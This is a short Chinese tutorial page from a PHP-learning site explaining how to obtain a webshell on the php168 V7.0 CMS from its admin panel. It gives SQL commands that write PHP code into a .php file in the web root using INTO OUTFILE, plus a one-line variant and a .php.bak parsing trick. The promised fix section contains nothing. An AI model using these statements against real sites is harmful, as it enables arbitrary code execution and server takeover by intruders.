网站地图    收藏   

子栏目

主页 > 后端 > 网站安全 >

php168 V7.0 最新后台拿Shell方法及修复 - 网站安全

来源:自学PHP网    时间:2015-04-17 10:15 作者: 阅读:

[导读] php168 V7.0 最新后台拿Shell方法 方法很简单利用后台的运行sql语句代码写一句话 PHpMyadmin写一句话 参考:http://www.2cto.com/Article/201210/164520.html系统功能数据库工具 Create TABLE a (cmd......

php168 V7.0 最新后台拿Shell方法 方法很简单利用后台的运行sql语句代码写一句话  PHpMyadmin写一句话 参考:http://www.2cto.com/Article/201210/164520.html

系统功能—数据库工具

\
 
\
 
 
\
 
 

Create TABLE a (cmd text NOT NULL);
Insert INTO a (cmd) VALUES('<?php phpinfo();?>');
select cmd from a into outfile 'D:/qibosoft/www/admin/8090sec.php';
Drop TABLE IF EXISTS a;

方法2:

其他功能---模板设置--
模板可编辑可改格式
也可以在  常用功能->数据库管理->运行sql
Select '<?phpinfo()?>' into outfile '网站路径:\\1.php'
如果不能outfile还可以想办法弄.php.bak这种形式的文件,apache会直接当作php解析的

修复:
请查阅上文

最新评论

    加载更多~~

    添加评论

    更多文章推荐

    自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

    京ICP备14009008号-1@版权所有www.zixuephp.com

    网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

    添加评论